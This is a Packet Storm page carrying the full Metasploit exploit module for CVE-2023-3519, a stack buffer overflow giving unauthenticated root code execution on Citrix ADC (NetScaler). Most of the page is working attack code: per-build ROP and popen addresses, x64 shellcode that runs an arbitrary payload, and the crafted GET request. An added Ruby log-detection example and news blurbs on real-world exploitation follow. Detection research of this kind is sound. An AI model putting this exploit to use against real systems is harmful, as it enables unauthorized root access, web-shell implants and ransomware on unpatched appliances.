
Citrix ADC (NetScaler) Remote Code Execution

A vulnerability (CVE-2023-3519) exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer overflow of the nsppe process by making a specially crafted HTTP GET request. Successful exploitation results in remote code execution as root.

Packet Storm
Tags: vulnerability, git, rce, buffer_overflow, auth, ssl
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Citrix ADC (NetScaler) Forms SSO Target RCE',
        'Description' => %q{
          A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer
          overflow of the nsppe process by making a specially crafted HTTP GET request. Successful exploitation results in
          remote code execution as root.
        },
        'Author' => [
          'Ron Bowes', # Analysis and module
          'Douglass McKee', # Analysis and module
          'Spencer McIntyre', # Just the module
        ],
        'References' => [
          ['CVE', '2023-3519'],
          ['URL', 'https://attackerkb.com/topics/si09VNJhHh/cve-2023-3519'],
          ['URL', 'https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467']
        ],
        'DisclosureDate' => '2023-07-18',
        'License' => MSF_LICENSE,
        'Platform' => ['unix'],
        'Arch' => [ARCH_CMD],
        'Payload' => {
          # at a certain point too much of the stack will get corrupted, should be less than target['fixup_rsp_adjustment']
          'Space' => 2048,
          'DisableNops' => true
        },
        # Every address below is build-specific: the binary is not position independent, so the
        # gadget and popen addresses must match the exact NetScaler build on the target.
        'Targets' => [
          [
            'Citrix ADC 13.1-48.47',
            {
              'fixup_return' => 0x00782403, # pop rbx; ns_aaa_cookie_valid
              'fixup_rsp_adjustment' => 0x13a8,
              'popen' => 0x01da6340,
              'return' => 0x00611ae9, # jmp rsp; ns_create_cfg_nsp
              'return_offset' => 168
            },
          ],
          [
            'Citrix ADC 13.1-37.38',
            {
              'fixup_return' => 0x0077c324, # pop rbx; ns_aaa_cookie_valid
              'fixup_rsp_adjustment' => 0x13a8,
              'popen' => 0x01d7e320,
              'return' => 0x015d131d, # jmp rsp; tfocookie_send_callback
              'return_offset' => 168
            },
          ],
          [
            'Citrix ADC 13.0-91.12',
            {
              'fixup_return' => 0x008530a2, # mov rbx, qword [rbp-0x28]; ns_aaa_cookie_valid
              'fixup_rsp_adjustment' => 0x12e0,
              # in this version the epilogue of ns_aaa_cookie_valid reads directly from rbp and since the exploit
              # clobbers it, the value needs to be restored
              'fixup_rbp_adjustment' => 0x190,
              'popen' => 0x01f42ec0,
              'return' => 0x024883bf, # jmp rsp; ns_pixl_eval_nvlist_t_typecast_list_t_dynamic
              'return_offset' => 168
            }
          ]
        ],
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true,
          'WfsDelay' => 10
        },
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  # Only fingerprints the NetScaler Gateway logon page; it does not read the build number,
  # so the best it can return is Detected, never Vulnerable.
  def check
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], 'logon', 'LogonPoint', 'index.html')
    })
    return CheckCode::Unknown if res.nil?
    return CheckCode::Safe unless res.code == 200 && res.body =~ /<title class="_ctxstxt_NetscalerGateway">/

    CheckCode::Detected
  end

  def exploit
    # The shellcode calls popen(cmd, "r") with the encoded payload as the command, then repairs
    # the stack (and rbp where needed) and returns into ns_aaa_cookie_valid so nsppe keeps running.
    shellcode = Metasm::Shellcode.assemble(Metasm::X64.new, Template.render(<<-SHELLCODE, target: target)).encode_string
      call loc_popen_arg1
        ; add this to the path for python payloads
        db "export PATH=/var/python/bin:$PATH;"
        db "#{Rex::Text.to_hex(payload.encoded)}", 0
      loc_popen_arg1:
        pop  rdi
      call loc_popen_arg2
        db "r", 0
      loc_popen_arg2:
        pop rsi
        mov  rax, <%= target['popen'] %>
        sub  rsp, 0x200
        call rax
      loc_return:
        xor rax, rax
        add rsp, <%= target['fixup_rsp_adjustment'] + 0x200 %>
        <% if target['fixup_rbp_adjustment'] %>
        mov rbp, rsp
        add rbp, <%= target['fixup_rbp_adjustment'] %>
        <% end %>
        push     <%= target['fixup_return'] %>
        ret
    SHELLCODE

    # Layout of the overflowing 'target' parameter: padding up to the saved return address,
    # the address of a 'jmp rsp' gadget, then the shellcode that the gadget lands on.
    buffer = rand_text_alphanumeric(target['return_offset'])
    buffer << [target['return']].pack('Q')
    # Bytes below 0xa0 are percent-encoded so the query string stays well formed; higher bytes are sent raw.
    buffer << shellcode.bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join

    send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], 'gwtest', 'formssso'),
      'encode_params' => false,  # we'll encode them ourselves
      'vars_get' => {
        'event' => 'start',
        'target' => buffer
      }
    })
  end

  # Minimal ERB-style renderer so the per-target constants can be substituted into the assembly source.
  class Template
    def self.render(template, context = nil)
      case context
      when Hash
        b = binding
        locals = context.collect { |k, _| "#{k} = context[#{k.inspect}]; " }
        b.eval(locals.join)
      when NilClass
        b = binding
      else
        raise ArgumentError
      end

      b.eval(Erubi::Engine.new(template).src)
    end
  end
end
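The module above tells you what the exploit request looks like on the wire: a GET to /gwtest/formssso with event=start and a 'target' parameter made of return_offset bytes of padding, a packed return address and percent-encoded shellcode. The following is an added example, not part of the Metasploit module or of Packet Storm's page, showing the log-side check a defender would build from that shape. It reuses the module's encoding rule to construct a sample attack line; the log format, addresses, hostnames and the stand-in byte range are all constructed for the example and are not a capture of real exploitation.

```ruby
# Added example (not from the Metasploit module): flag CVE-2023-3519 exploitation
# attempts against /gwtest/formssso in web-server style access logs. The decoded
# 'target' value of a real Forms SSO request is a short URL; the module's request
# carries at least return_offset bytes of padding plus a packed address and
# shellcode, and therefore non-printable bytes. Log layout below is constructed.

FORMSSSO_PATH = '/gwtest/formssso'
RETURN_OFFSET = 168 # padding length used by all three module targets

# Reproduces the module's encoding: bytes below 0xa0 are percent-encoded, the
# rest are sent raw. Used here only to build the constructed attack sample.
def msf_style_encode(bytes)
  bytes.map { |b| b < 0xa0 ? format('%%%02x', b) : b.chr }.join
end

# Reverses %xx escapes into raw bytes; all other bytes are kept as they are.
def percent_decode(str)
  str.b.gsub(/%([0-9a-fA-F]{2})/) { Regexp.last_match(1).hex.chr }
end

# Pulls the request path and query string out of a combined-format log line.
# Returns nil when the line carries no recognisable request.
def parse_request(line)
  m = line.b.match(/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/)
  return nil unless m

  path, query = m[1].split('?', 2)
  [path, query.to_s]
end

# Splits a query string into a hash; values are left encoded.
def query_params(query)
  query.split('&').each_with_object({}) do |pair, params|
    key, value = pair.split('=', 2)
    params[key] = value.to_s
  end
end

# Returns nil for benign traffic, otherwise a hash with the event name, the
# decoded length of 'target' and the reasons the request was flagged.
def check_formssso_request(line)
  path, query = parse_request(line)
  return nil unless path == FORMSSSO_PATH

  params = query_params(query)
  return nil unless params.key?('target')

  decoded = percent_decode(params['target'])
  reasons = []
  if decoded.bytesize > RETURN_OFFSET
    reasons << "target is #{decoded.bytesize} bytes, more than the #{RETURN_OFFSET}-byte return_offset"
  end
  if decoded.each_byte.any? { |b| b < 0x20 || b > 0x7e }
    reasons << 'target carries non-printable bytes (packed address or shellcode)'
  end
  return nil if reasons.empty?

  { event: params['event'], decoded_length: decoded.bytesize, reasons: reasons }
end

# Constructed sample: an ordinary Forms SSO start request with a URL target.
BENIGN_LINE = '10.0.0.5 - - [18/Jul/2023:10:12:01 +0000] ' \
              '"GET /gwtest/formssso?event=start&target=https%3A%2F%2Fintranet.example.com%2F HTTP/1.1" 302 0'

# Constructed sample shaped like the module's request: padding, a packed address
# and a stand-in byte range (not shellcode), encoded the way the module does it.
def constructed_attack_line
  stand_in = [0x00611ae9].pack('Q') + (0x00..0xff).to_a.pack('C*')
  target = ('A' * RETURN_OFFSET) + msf_style_encode(stand_in.bytes)
  '198.51.100.7 - - [18/Jul/2023:10:12:02 +0000] "GET /gwtest/formssso?event=start&target=' +
    target + ' HTTP/1.1" 200 0'
end
```

The 168-byte threshold is the module's own return_offset, which is the same for all three supported builds; a production rule would also key on event=start and on the appliance's own HTTP access logging rather than the constructed combined format used here. Note that the percent-encoding rule guarantees the attacker's query string stays well formed, so a parser that only looks for malformed requests will not see anything.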

Related news

U.S. Agencies Warn of Iranian Hacking Group's Ongoing Ransomware Attacks

U.S. cybersecurity and intelligence agencies have called out an Iranian hacking group for breaching multiple organizations across the country and coordinating with affiliates to deliver ransomware. The activity has been linked to a threat actor dubbed Pioneer Kitten, which is also known as Fox Kitten, Lemon Sandstorm (formerly Rubidium), Parisite, and UNC757, which it described as connected to

Citrix, VMware, and Atlassian Hit with Critical Flaws — Patch ASAP!

Citrix is warning of two zero-day security vulnerabilities in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) that are being actively exploited in the wild. The flaws are listed below - CVE-2023-6548 (CVSS score: 5.5) - Authenticated (low privileged) remote code execution on Management Interface (requires access to NSIP, CLIP, or SNIP with management

Critical Citrix Bug Exploited as a Zero-Day, 'Patching Is Not Enough'

The latest threat to Citrix NetScaler, CVE-2023-4966, was exploited as a zero-day bug for months before a patch was issued. Researchers expect exploitation efforts to surge.

Citrix Devices Under Attack: NetScaler Flaw Exploited to Capture User Credentials

A recently disclosed critical flaw in Citrix NetScaler ADC and Gateway devices is being exploited by threat actors to conduct a credential harvesting campaign. IBM X-Force, which uncovered the activity last month, said adversaries exploited "CVE-2023-3519 to attack unpatched NetScaler Gateways to insert a malicious script into the HTML content of the authentication web page to capture user

Citrix NetScaler Alert: Ransomware Hackers Exploiting Critical Vulnerability

Unpatched Citrix NetScaler systems exposed to the internet are being targeted by unknown threat actors in what's suspected to be a ransomware attack. Cybersecurity company Sophos is tracking the activity cluster under the moniker STAC4663. Attack chains involve the exploitation of CVE-2023-3519, a critical code injection vulnerability impacting NetScaler ADC and Gateway servers that could

CISA Adds Citrix ShareFile Flaw to KEV Catalog Due to In-the-Wild Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw in Citrix ShareFile storage zones controller to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active in-the-wild exploitation. Tracked as CVE-2023-24489 (CVSS score: 9.8), the shortcoming has been described as an improper access control bug that, if successfully exploited

Citrix NetScalers backdoored in widespread exploitation campaign

Researchers have found almost 2000 backdoored Citrix NetScalers, many of which were patched after the backdoor in the form of a web shell was dropped. Source: Malwarebytes Labs. Tags: Citrix, NetScalers, Germany, CVE-2023-3519, Fox-IT, DIVD.

Nearly 2,000 Citrix NetScaler Instances Hacked via Critical Vulnerability

Nearly 2,000 Citrix NetScaler instances have been compromised with a backdoor by weaponizing a recently disclosed critical security vulnerability as part of a large-scale attack. "An adversary appears to have exploited CVE-2023-3519 in an automated fashion, placing web shells on vulnerable NetScalers to gain persistent access," NCC Group said in an advisory released Tuesday. "The adversary can

Hundreds of Citrix NetScaler ADC and Gateway Servers Hacked in Major Cyber Attack

Hundreds of Citrix NetScaler ADC and Gateway servers have been breached by malicious actors to deploy web shells, according to the Shadowserver Foundation. The non-profit said the attacks take advantage of CVE-2023-3519, a critical code injection vulnerability that could lead to unauthenticated remote code execution. The flaw, patched by Citrix last month, carries a CVSS score of 9.8. The

Apple iOS, Google Android Patch Zero-Days in July Security Updates

Plus: Mozilla fixes two high-severity bugs in Firefox, Citrix fixes a flaw that was used to attack a US-based critical infrastructure organization, and Oracle patches over 500 vulnerabilities.

CISA: You've got two weeks to patch Citrix NetScaler vulnerability CVE-2023-3519

A critical unauthenticated remote code execution vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway is being actively exploited. Source: Malwarebytes Labs. Tags: Citrix, NetScaler, CVE-2023-3519, web shell.

Citrix NetScaler ADC and Gateway Devices Under Attack: CISA Urges Immediate Action

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory on Thursday warning that the newly disclosed critical security flaw in Citrix NetScaler Application Delivery Controller (ADC) and Gateway devices is being abused to drop web shells on vulnerable systems. "In June 2023, threat actors exploited this vulnerability as a zero-day to drop a web shell on a critical

Zero-Day Attacks Exploited Critical Vulnerability in Citrix ADC and Gateway

Citrix is alerting users of a critical security flaw in NetScaler Application Delivery Controller (ADC) and Gateway that it said is being actively exploited in the wild. Tracked as CVE-2023-3519 (CVSS score: 9.8), the issue relates to a case of code injection that could result in unauthenticated remote code execution. It impacts the following versions - NetScaler ADC and NetScaler Gateway 13.1
